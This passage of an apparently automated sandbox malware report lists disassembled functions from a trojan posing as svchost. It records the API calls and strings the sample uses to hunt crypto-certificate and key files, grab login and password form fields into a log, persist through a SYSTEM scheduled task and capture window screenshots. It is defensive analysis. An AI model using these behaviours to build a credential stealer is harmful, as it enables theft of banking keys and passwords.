Part of subcall function 02D23770: SetLastError.KERNEL32(00000000), ref: 02D2380B
Part of subcall function 02D23770: SetCurrentDirectoryA.KERNEL32(?), ref: 02D23818
Part of subcall function 02D23770: PathAddBackslashA.SHLWAPI(02D5D098,?,02D239CC), ref: 02D23887

PathAddBackslashA.SHLWAPI(02D5D098), ref: 02D239D6

Strings

STF, xrefs: 02D239DC
DefaultPrivateDir, xrefs: 02D2397A
General, xrefs: 02D2397F
\t, xrefs: 02D239D6
interpro.ini, xrefs: 02D23942

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
String ID: DefaultPrivateDir$General$STF$interpro.ini$\t
API String ID: 2256374885-3682521933
Opcode ID: 4c6e8e91a95a070fd8c11ff839ab51b43fd64591b9af26d3c343652a24dd2324
Instruction ID: 3ae8953ed15eb1bb12510c3468db536db23d75142a2e634ceeb2af65796d037e
Opcode Fuzzy Hash: 4c6e8e91a95a070fd8c11ff839ab51b43fd64591b9af26d3c343652a24dd2324
Instruction Fuzzy Hash: 5E11A5B99802159FD750DF64ED48EDA77B8EB54704F0085C5A58997340DAB49D88CF60

Function 02D2D638 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 135filestringCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02D2D6CA
strchr.MSVCRT ref: 02D2D6D9
MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02D2D7C5
FindFirstFileW.KERNEL32(?,?), ref: 02D2D7D9

Strings

o, xrefs: 02D2D674
t, xrefs: 02D2D66B
Desk, xrefs: 02D2D692
p, xrefs: 02D2D67D
\, xrefs: 02D2D749
Network Favorites, xrefs: 02D2D68D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
String ID: Desk$Network Favorites$\$o$p$t
API String ID: 23527507-2295261572
Opcode ID: ff67d68a513e9fed65bd26715be85a1d4c12569a281f8ca15b6d1797c166825e
Instruction ID: b1e286ac0de3b7958ab8e591ee340fff38032587ec554bb74ccfb33421ed556e
Opcode Fuzzy Hash: ff67d68a513e9fed65bd26715be85a1d4c12569a281f8ca15b6d1797c166825e
Instruction Fuzzy Hash: 124158319002AD5FEF258A24DC547EA77A2EB91309F2442E5D98AA7340D730AE8DCF60

Function 02D21160 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100threadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D21184
StrStrIA.SHLWAPI(?,cbsmain.dll), ref: 02D21196
GetAncestor.USER32(?,00000002,?,00000104), ref: 02D211B6
GetWindowTextA.USER32(00000000), ref: 02D211BD
CreateThread.KERNEL32(?,?,02D21400,?,?,?), ref: 02D2125E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D21276
CloseHandle.KERNEL32(00000000), ref: 02D21287

Strings

cbsmain.dll, xrefs: 02D2118A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$AncestorCloseCreateFileInformationModuleNameTextThreadWindow
String ID: cbsmain.dll
API String ID: 741776142-1394916644
Opcode ID: da1d4f7d4628e91c31701c7070b21d93788e01de497e00405ea3a54902ad99cc
Instruction ID: 71b8ea4ecb7db0aac462ca673aeef3cd401ac88e57892ba485ee4028964b4f3f
Opcode Fuzzy Hash: da1d4f7d4628e91c31701c7070b21d93788e01de497e00405ea3a54902ad99cc
Instruction Fuzzy Hash: 8031E575A442795BD7218F30989ABB63BA99F2234CF54C684F989CA382D772CC4CCA50

Function 02D092D0 Relevance: 13.5, APIs: 9, Instructions: 49clipboardmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?), ref: 02D092DF
GlobalLock.KERNEL32(00000000), ref: 02D092ED
MultiByteToWideChar.KERNEL32(000004E3,00000001,?,?,00000000,?), ref: 02D09306
GlobalUnlock.KERNEL32(00000000), ref: 02D09313
OpenClipboard.USER32(00000000), ref: 02D0931B
GlobalFree.KERNEL32(00000000), ref: 02D09327
EmptyClipboard.USER32 ref: 02D09333
SetClipboardData.USER32(0000000D,00000000), ref: 02D0933C
CloseClipboard.USER32 ref: 02D09342

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
String ID:
API String ID: 1484758812-0
Opcode ID: f423fdfd22e580d374b5b023b2f691244e540e25909a8b0c6e2891f42a4ff2bc
Instruction ID: f012a38a8095b2437c1aaabed80b867b2bc92568afcfb0149942c30186014db3
Opcode Fuzzy Hash: f423fdfd22e580d374b5b023b2f691244e540e25909a8b0c6e2891f42a4ff2bc
Instruction Fuzzy Hash: A101713A581215BFDB109FA0FC8CEEE77ACEF68755F808116FA45CA285CB614C10CAB0

Function 02D0CB80 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 02D0CB88
IsIconic.USER32(00000000), ref: 02D0CB93

Part of subcall function 02D0C780: IsWindow.USER32(00000000), ref: 02D0C79D
Part of subcall function 02D0C780: IsWindowVisible.USER32(00000000), ref: 02D0C7AC
Part of subcall function 02D0C780: GetWindowRect.USER32(00000000,?), ref: 02D0C7E9
Part of subcall function 02D0C780: GetClassLongA.USER32(00000000,000000E6), ref: 02D0C7F2
Part of subcall function 02D0C780: PrintWindow.USER32(00000000,?,00000000,?,?,75A73EB0,?,?,?,02D090B9), ref: 02D0C805
Part of subcall function 02D0C780: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,?,75A73EB0,?,?,?,02D090B9), ref: 02D0C82B
Part of subcall function 02D0C780: CreateRectRgn.GDI32(?,?,02D090B9,?), ref: 02D0C841
Part of subcall function 02D0C780: GetWindowRgn.USER32(00000000,00000000), ref: 02D0C84B
Part of subcall function 02D0C780: OffsetRgn.GDI32(00000000,?,?), ref: 02D0C865
Part of subcall function 02D0C780: SelectClipRgn.GDI32(?,00000000), ref: 02D0C870
Part of subcall function 02D0C780: BitBlt.GDI32(?,?,?,02D090B9,?,?,00000000,00000000,00CC0020), ref: 02D0C899

memset.MSVCRT ref: 02D0CBBC

Part of subcall function 02D0CA20: GetWindowRect.USER32(02D0CB54,00000000), ref: 02D0CA2F
Part of subcall function 02D0CA20: GetWindowLongA.USER32(02D0CB54,000000F0), ref: 02D0CA49
Part of subcall function 02D0CA20: GetScrollBarInfo.USER32(02D0CB54,000000FA,?), ref: 02D0CA64
Part of subcall function 02D0CA20: GetScrollBarInfo.USER32(02D0CB54,000000FB,0000003C), ref: 02D0CA91

GetWindow.USER32(00000000,00000005), ref: 02D0CBDD
GetWindow.USER32(00000000), ref: 02D0CBE0

Part of subcall function 02D0CB10: memset.MSVCRT ref: 02D0CB41
Part of subcall function 02D0CB10: GetWindow.USER32(02D0D04D,00000005), ref: 02D0CB5C
Part of subcall function 02D0CB10: GetWindow.USER32(00000000), ref: 02D0CB5F
Part of subcall function 02D0CB10: GetWindow.USER32(02D0D04D,00000003), ref: 02D0CB6A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Rect$InfoLongScrollmemset$ClassClipCreateIconicOffsetPrintRedrawSelectVisible
String ID:
API String ID: 1230479295-0
Opcode ID: 4e548364062b0f436634eb005f3d9ab3a9b63fd7f9bed9bbe3806b458b05e1c2
Instruction ID: bc2a57cba8d44fa14d439e4934c675620823c195b7fcbe278ba72c1bb423c7f9
Opcode Fuzzy Hash: 4e548364062b0f436634eb005f3d9ab3a9b63fd7f9bed9bbe3806b458b05e1c2
Instruction Fuzzy Hash: 7AF09661E942143BDB217B75AC8DFAF3BACDB41B05F00050AF904E63D0EB955C54CBA2

Function 02D20320 Relevance: 86.1, APIs: 42, Strings: 7, Instructions: 347memorysleepstringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D20340
PathAddBackslashA.SHLWAPI(5c590484), ref: 02D20367
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D203A5
GetLastError.KERNEL32 ref: 02D203AF
IsUserAnAdmin.SHELL32 ref: 02D203B7
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D203C9
SetLastError.KERNEL32(00000000), ref: 02D203D0
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D2040C
DeleteFileA.KERNEL32(?), ref: 02D2041A
PathAddBackslashA.SHLWAPI(5c590484,?,?), ref: 02D20455
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D2048F
GetLastError.KERNEL32 ref: 02D20499
IsUserAnAdmin.SHELL32 ref: 02D204A1
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D204B0

Part of subcall function 02D28770: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02D29408,00000000,00000000,74E1A250,?,02D138BD,00000000,00000000,00000000,00000000,?), ref: 02D28797
Part of subcall function 02D28770: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02D29408,00000000,00000000,74E1A250,?,02D138BD,00000000,00000000,00000000,00000000), ref: 02D287B7
Part of subcall function 02D28770: CloseHandle.KERNEL32(?,?,?,02D29408,00000000,00000000,74E1A250,?,02D138BD,00000000,00000000,00000000,00000000), ref: 02D287C8
Part of subcall function 02D28770: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02D29408,00000000,00000000,74E1A250,?,02D138BD,00000000,00000000,00000000,00000000), ref: 02D287E1
Part of subcall function 02D28770: CloseHandle.KERNEL32(?,?,?,02D29408,00000000,00000000,74E1A250,?,02D138BD,00000000,00000000,00000000,00000000), ref: 02D287F2

SetLastError.KERNEL32(00000000), ref: 02D204B7
GetFileAttributesA.KERNEL32(?), ref: 02D204E5
SetCurrentDirectoryA.KERNEL32(?), ref: 02D20510
memset.MSVCRT ref: 02D2055B
lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02D20575
memset.MSVCRT ref: 02D205B8
lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02D205D2
Sleep.KERNEL32(000003E8,?,?,02D4A56C,00000002), ref: 02D205F7
memset.MSVCRT ref: 02D2063A
lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02D20654
Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02D20679
GetProcessHeap.KERNEL32(00000000,?,?), ref: 02D206B0
HeapValidate.KERNEL32(00000000), ref: 02D206B3
GetProcessHeap.KERNEL32(00000000,?), ref: 02D206C0
HeapFree.KERNEL32(00000000), ref: 02D206C3
CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02D206D2
Sleep.KERNEL32(000003E8), ref: 02D206E3
ReleaseMutex.KERNEL32(00000000), ref: 02D206EA
GetHandleInformation.KERNEL32 ref: 02D206FE
CloseHandle.KERNEL32(00000000), ref: 02D20710
GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02D2073D
HeapValidate.KERNEL32(00000000), ref: 02D20740
GetProcessHeap.KERNEL32(00000000,?), ref: 02D2074D
HeapFree.KERNEL32(00000000), ref: 02D20750
GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02D20759
HeapValidate.KERNEL32(00000000), ref: 02D2075C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D2076D
HeapFree.KERNEL32(00000000), ref: 02D20770

Strings

path.txt, xrefs: 02D203E8
secret.key, xrefs: 02D20568, 02D20579, 02D205C5
keys.zip, xrefs: 02D204CA
5c590484, xrefs: 02D20362, 02D2036D, 02D20450, 02D2045B
pubkeys.key, xrefs: 02D20647, 02D20658
\t, xrefs: 02D20367, 02D20455
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D206C9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
String ID: 5c590484$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$keys.zip$path.txt$pubkeys.key$secret.key$\t
API String ID: 3271848171-3222107752
Opcode ID: adfacd146a6299418859e93d3f855c581ce9f437c6d82e15f808a339b03e3261
Instruction ID: 597966f1e9c1591e89958efca32f4dde53753176fa05213937a22750b3d201dc
Opcode Fuzzy Hash: adfacd146a6299418859e93d3f855c581ce9f437c6d82e15f808a339b03e3261
Instruction Fuzzy Hash: 8CC11674944361AFD7209F64A898BAB7BE8EFA5309F448919F585C7380DB70DC1CCBA1

Function 02D106A0 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02D106E1
HeapAlloc.KERNEL32(00000000), ref: 02D106E4
memset.MSVCRT ref: 02D106FE
InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02D1071E
GetProcessHeap.KERNEL32(00000008,?), ref: 02D1073F
HeapAlloc.KERNEL32(00000000), ref: 02D10742
memset.MSVCRT ref: 02D10757
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D1076D
InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02D10789
InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02D1079C
GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D107AC
HeapAlloc.KERNEL32(00000000), ref: 02D107AF
memset.MSVCRT ref: 02D107CA
InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02D107DD
GetProcessHeap.KERNEL32(00000008,?), ref: 02D10829
HeapAlloc.KERNEL32(00000000), ref: 02D1082C
memset.MSVCRT ref: 02D10840
memset.MSVCRT ref: 02D10850
memcpy.MSVCRT ref: 02D1085E
_snprintf.MSVCRT ref: 02D108A0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D108CC
HeapValidate.KERNEL32(00000000), ref: 02D108CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D108DC
HeapFree.KERNEL32(00000000), ref: 02D108DF
GetProcessHeap.KERNEL32(00000000,?), ref: 02D108EB
HeapValidate.KERNEL32(00000000), ref: 02D108EE
GetProcessHeap.KERNEL32(00000000,?), ref: 02D108FB
HeapFree.KERNEL32(00000000), ref: 02D108FE
GetProcessHeap.KERNEL32(00000000,?), ref: 02D10914
HeapValidate.KERNEL32(00000000), ref: 02D10917
GetProcessHeap.KERNEL32(00000000,?), ref: 02D10924
HeapFree.KERNEL32(00000000), ref: 02D10927
GetProcessHeap.KERNEL32(00000000,?,?), ref: 02D10946
HeapValidate.KERNEL32(00000000), ref: 02D1094F
GetProcessHeap.KERNEL32(00000000,?), ref: 02D10958
HeapFree.KERNEL32(00000000), ref: 02D1095B
GetProcessHeap.KERNEL32(00000000,?), ref: 02D10967
HeapValidate.KERNEL32(00000000), ref: 02D1096A
GetProcessHeap.KERNEL32(00000000,?), ref: 02D10973
HeapFree.KERNEL32(00000000), ref: 02D10976

Strings

UserAgent, xrefs: 02D1087D, 02D10889
}}}, xrefs: 02D108B8
[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s, xrefs: 02D10899

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
API String ID: 1808236364-2343086565
Opcode ID: 101443e14eaa690f37987dd3cb60a8167d31329a98f5829e7ca73bca028eae22
Instruction ID: 2454d5be1b97f959630bd8b78af6c5527c9b854336c879622d5ed65fa733f6f4
Opcode Fuzzy Hash: 101443e14eaa690f37987dd3cb60a8167d31329a98f5829e7ca73bca028eae22
Instruction Fuzzy Hash: 84A1BE75A00209BBEB10EFA8AC49FAFBBB8EF95715F144545F904A7380DB709D51CBA0

Function 02D1DAC0 Relevance: 68.4, APIs: 25, Strings: 14, Instructions: 184threadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DAFA
StrStrIA.SHLWAPI(?,\crypto\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DB08
StrStrIA.SHLWAPI(00000001,02D46228,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DB15
StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DB87
StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DB97
StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DBA7
StrStrIA.SHLWAPI(?,\crypto pro\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DBB7
StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DBC7
StrStrIA.SHLWAPI(?,\temporary internet files\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DBD7
StrStrIA.SHLWAPI(?,:\users\public,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DBE7
StrStrIA.SHLWAPI(?,02D4A214,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DBF7
StrStrIA.SHLWAPI(00000000,02D46228,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DC03
StrStrIA.SHLWAPI(?,\cryptokit\,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DC13
StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02D0107F,00000000,?,02D0148C,00000000,?), ref: 02D1DC1F
CreateThread.KERNEL32(00000000,00000000,02D1C350,?,00000000,00000000), ref: 02D1DC42

Strings

:\progra~1\common~1\crypto~1, xrefs: 02D1DC19
\crypto\, xrefs: 02D1DB02
\temporary internet files\, xrefs: 02D1DBD1
\public\, xrefs: 02D1DB59, 02D1DB71
\progra~1\crypto~1\, xrefs: 02D1DBC1
\crypto pro\, xrefs: 02D1DBB1
\private\, xrefs: 02D1DB4C, 02D1DB65
crypto, xrefs: 02D1DB2E
\microsoft\crypto\, xrefs: 02D1DBA1
\maxthon3\public\, xrefs: 02D1DB91
self.cer, xrefs: 02D1DAF4
:\users\public, xrefs: 02D1DBE1
\cryptokit\, xrefs: 02D1DC0D
\micros~\crypto\, xrefs: 02D1DB81

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
API String ID: 2422867632-4225811205
Opcode ID: 7138a0195edc48cefef29a5791d6ffe199c66c2b3eb70b50b6be9b5c3560e1d8
Instruction ID: 16399ff67ce8728e8c214f3e671106133bce215b1506000b23fd3f58beb294bb
Opcode Fuzzy Hash: 7138a0195edc48cefef29a5791d6ffe199c66c2b3eb70b50b6be9b5c3560e1d8
Instruction Fuzzy Hash: 2041C1B168132673B6211A357D89F6B1F9F8E589D87240912BC07E2708FFE4DC46C5B0

Function 004033B0 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004033FE
memset.MSVCRT ref: 0040341E
memset.MSVCRT ref: 0040343E
IsUserAnAdmin.SHELL32 ref: 00403446
GetVersionExA.KERNEL32 ref: 00403461

Part of subcall function 00403310: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
Part of subcall function 00403310: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
Part of subcall function 00403310: OpenProcessToken.ADVAPI32(00000000), ref: 00403360
Part of subcall function 00403310: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
Part of subcall function 00403310: CloseHandle.KERNEL32(00000000), ref: 00403397

GetTickCount.KERNEL32 ref: 004034A5
_snwprintf.MSVCRT ref: 004034BE
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE

Strings

<Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 004033C4
<Actions , xrefs: 0040365A
task%d, xrefs: 004034AC
\\?\globalroot\systemroot\system32\tasks\, xrefs: 004033E7
p=)u, xrefs: 0040379B
00-->, xrefs: 0040368F

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=)u$task%d
API String ID: 1601901853-2209026672
Opcode ID: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction ID: 1b369b621c6b50f993c5cfef2b03b24b37f74764d04c33fe2e8d64a6d5fdefe9
Opcode Fuzzy Hash: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction Fuzzy Hash: F8D1C3B1504301ABD720DF64CC49B5B7BE8EFC8715F048A29FA49A72D1E774EA04CB99

Function 02D18A60 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 244memorystringthreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,7591F570,?,?), ref: 02D18A83
HeapAlloc.KERNEL32(00000000), ref: 02D18A8A
memset.MSVCRT ref: 02D18A9E
IsBadReadPtr.KERNEL32(?,?), ref: 02D18ABB
memcpy.MSVCRT ref: 02D18ACC
strstr.MSVCRT ref: 02D18ADD
strstr.MSVCRT ref: 02D18AF0
PathAddBackslashA.SHLWAPI(5C59061E), ref: 02D18B1D
PathAppendA.SHLWAPI(?,5C59061E), ref: 02D18B2B
PathAddBackslashA.SHLWAPI(5C59061E), ref: 02D18B36
strstr.MSVCRT ref: 02D18B98
strstr.MSVCRT ref: 02D18BAB
PathAddBackslashA.SHLWAPI(5C5901AC), ref: 02D18BDD
PathAppendA.SHLWAPI(?,5C5901AC), ref: 02D18BEB
PathAddBackslashA.SHLWAPI(5C5901AC), ref: 02D18BF6
CreateThread.KERNEL32(00000000,00000000,02D221E0,00000000,00000000,00000000), ref: 02D18C51
strstr.MSVCRT ref: 02D18C70
strstr.MSVCRT ref: 02D18C83
PathAddBackslashA.SHLWAPI(02D5D098), ref: 02D18CAF
PathAppendA.SHLWAPI(?,02D5D098), ref: 02D18CBD
PathAddBackslashA.SHLWAPI(02D5D098), ref: 02D18CC8
CreateThread.KERNEL32(00000000,00000000,02D23910,00000000,00000000,00000000), ref: 02D18D23
GetHandleInformation.KERNEL32(00000000,?), ref: 02D18D3B
CloseHandle.KERNEL32(00000000), ref: 02D18D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D18D5B
HeapValidate.KERNEL32(00000000), ref: 02D18D5E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D18D6B
HeapFree.KERNEL32(00000000), ref: 02D18D6E

Strings

password=, xrefs: 02D18AEA
5C5901AC, xrefs: 02D18BD8, 02D18BDF, 02D18BF1, 02D18BF8
pass.log, xrefs: 02D18B58, 02D18C18, 02D18CEA
pass_, xrefs: 02D18BA5
&ctl00%24MainMenu%24Login1%24UserName=, xrefs: 02D18C6A
login=, xrefs: 02D18AD7
5C59061E, xrefs: 02D18B18, 02D18B1F, 02D18B31, 02D18B38
name_, xrefs: 02D18B92
&ctl00%24MainMenu%24Login1%24Password=, xrefs: 02D18C7D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$5C5901AC$5C59061E$login=$name_$pass.log$pass_$password=
API String ID: 3712039096-1457262009
Opcode ID: 328ab07ceb04116ff850e666208ea8c83180ec979791eaf5311fb2183619ff3d
Instruction ID: 72793a6cd89f1110c1d30623a53e57e6695c06a6d6b00c2e3e80149a11bc5cbb
Opcode Fuzzy Hash: 328ab07ceb04116ff850e666208ea8c83180ec979791eaf5311fb2183619ff3d
Instruction Fuzzy Hash: 3681E334A40324ABEB21DB65BC94BDB3BE89F55704F148495FD89E7350DBA0AD08CBA1

Function 02D07E40 Relevance: 61.4, APIs: 32, Strings: 3, Instructions: 182memorysleepsynchronizationCOMMON

